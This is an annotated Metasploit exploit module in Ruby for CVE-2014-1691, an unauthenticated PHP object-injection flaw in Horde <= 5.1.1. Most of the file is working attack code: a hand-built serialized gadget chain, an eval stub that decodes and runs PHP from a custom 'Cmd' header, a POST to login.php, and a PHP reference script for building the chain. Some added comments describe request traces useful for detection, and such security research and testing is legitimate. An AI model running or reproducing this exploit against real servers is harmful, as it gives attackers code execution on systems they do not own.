GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/horde_unserialize_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
# Exploit module for CVE-2014-1691: PHP object injection through unserialize()
# in Horde <= 5.1.1 (lib/Horde/Variables.php, per the module description).
# The serialized object graph built in #send_request_exploit is submitted as the
# `_formvars` POST parameter of login.php; on the server it reaches
# Horde_Kolab_Server_Decorator_Clean::__destruct() and from there a
# call_user_func() in Horde_Prefs (see the description below and the PHP
# reference chain in the =begin/=end block at the end of this file).
#
# Defender notes, derived only from the requests this module sends:
#   * The request is an unauthenticated POST to <TARGETURI>login.php whose
#     `_formvars` value starts with `O:34:"Horde_Kolab_Server_Decorator_Clean"`
#     and whose property names contain NUL bytes (PHP private/protected markers).
#   * The PHP code to run travels base64-encoded in a non-standard `Cmd` request
#     header rather than inside the serialized data.
#   * #check is not passive: it executes a `print` on the target through the same
#     chain, so a "check" run leaves the same request shape in web server logs.
class MetasploitModule < Msf::Exploit::Remote
  # Metasploit reliability ranking for this module.
  Rank = ExcellentRanking

  # Supplies send_request_cgi, normalize_uri and target_uri used below.
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata (name, description, authors, references,
  # platform/arch, payload constraints, targets) and the TARGETURI option.
  #
  # @param info [Hash] framework-supplied module info merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Horde Framework Unserialize PHP Code Execution',
      'Description' => %q{
        This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be
        abused to allow unauthenticated users to execute arbitrary code with the permissions of
        the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
        The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
        class to reach a dangerous call_user_func() call in the Horde_Prefs class.
      },
      'Author' =>
        [
          'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
          'juan vazquez' # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2014-1691' ],
          [ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
          [ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],
          [ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]
        ],
      # No authentication is needed; the payload runs as the web server user.
      'Privileged' => false,
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Payload' =>
        {
          # The payload is eval()'d as PHP source, so NOP padding makes no sense here.
          'DisableNops' => true
        },
      'Targets' => [ ['Horde 5', { }], ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2013-06-27'
    ))

    # TARGETURI is the Horde web root; login.php is appended in #send_request_exploit.
    register_options(
      [
        OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])
      ])
  end

  # Probes the target by executing a PHP `print <marker>;die;` through the
  # deserialization chain and looking for the marker in the response body.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is echoed back,
  #   Safe otherwise
  def check
    # 20..29 random letters (rand(10) is 0..9). Letters only, so interpolating
    # the marker into the regexp below adds no regexp metacharacters.
    flag = rand_text_alpha(rand(10)+20)
    res = send_request_exploit("print #{flag};die;")
    if res and res.body and res.body.to_s =~ /#{flag}/
      return Exploit::CheckCode::Vulnerable
    end
    # NOTE(review): a nil response (e.g. no connection at all) also lands here and
    # is reported as Safe; CheckCode::Unknown would be the more accurate verdict.
    return Exploit::CheckCode::Safe
  end

  # Runs #check first and aborts via fail_with(Failure::NotVulnerable) unless the
  # marker round-trips; otherwise delivers the framework-provided PHP payload
  # through the same deserialization request.
  def exploit
    print_status("Testing injection...")
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")
    end

    print_status("Exploiting the unserialize()...")
    # payload.encoded is the PHP source selected by the user; it is carried in the
    # Cmd header, not in the serialized object graph.
    send_request_exploit(payload.encoded)
  end

  # Builds the PHP object-injection payload and POSTs it to login.php.
  #
  # @param p [String] PHP source to execute on the target. It is not embedded in
  #   the serialized data; it is sent base64-encoded in the `Cmd` HTTP header
  #   (seen by PHP as $_SERVER['HTTP_CMD']) and the fixed stub in php_injection
  #   decodes and eval()s it server-side.
  # @return the response object from send_request_cgi, or nil when no response
  #   was obtained (which #check relies on)
  def send_request_exploit(p)
    # Stub stored in Horde_Config::_oldConfig; decodes and runs the Cmd header.
    # Its length is interpolated into the serialized string below, so the stub
    # text and the s:<len> field cannot drift apart.
    php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"

    # PHP serialized object graph (mirrors the PHP reference chain at the end of
    # the file). Property names carry the NUL-byte prefixes PHP uses when
    # serializing: "\0Class\0name" for private, "\0*\0name" for protected. Every
    # s:<n> is a byte length that PHP verifies on unserialize(), so renaming any
    # class or property requires recomputing the hard-coded lengths (43, 9, 8, ...).
    #
    # Outer object: Horde_Kolab_Server_Decorator_Clean with two private
    # properties, _server (set next) and _added (set last).
    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"
    # _server -> Horde_Prefs_Identity whose protected _prefs is a Horde_Prefs;
    # Horde_Prefs::_opts['sizecallback'] is the callable later handed to
    # call_user_func():
    # NOTE(review): `<<` mutates the literal; adding `# frozen_string_literal: true`
    # to this file would raise FrozenError on these appends.
    payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
    # sizecallback = array(Horde_Config(_oldConfig = php_injection), 'readXMLConfig')
    payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"
    # Horde_Prefs::_scopes['horde'] -> Horde_Prefs_Scope with protected _prefs = array(1)
    payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"
    # Horde_Prefs_Identity::_prefnames['identities'] = 0, then the decorator's
    # private _added = array(1), closing the outer object.
    payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"

    # Unauthenticated POST to login.php. The serialized graph goes through the
    # _formvars parameter, presumably the input that reaches the unserialize() in
    # lib/Horde/Variables.php named in the description.
    send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path.to_s, "login.php"),
        'method' => 'POST',
        'vars_post' => {
          '_formvars' => payload_serialized
        },
        'headers' => {
          # Custom header read back by the stub as $_SERVER['HTTP_CMD'].
          'Cmd' => Rex::Text.encode_base64(p)
        }
      })
  end
end
=begin
PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection
class Horde_Config
{
protected $_oldConfig = "phpinfo();die;";
}
class Horde_Prefs_Scope
{
protected $_prefs = array(1);
}
class Horde_Prefs
{
protected $_opts, $_scopes;
function __construct()
{
$this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
$this->_scopes['horde'] = new Horde_Prefs_Scope;
}
}
class Horde_Prefs_Identity
{
protected $_prefs, $_prefnames;
function __construct()
{
$this->_prefs = new Horde_Prefs;
$this->_prefnames['identities'] = 0;
}
}
class Horde_Kolab_Server_Decorator_Clean
{
private $_server, $_added = array(1);
function __construct()
{
$this->_server = new Horde_Prefs_Identity;
}
}
$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);
=end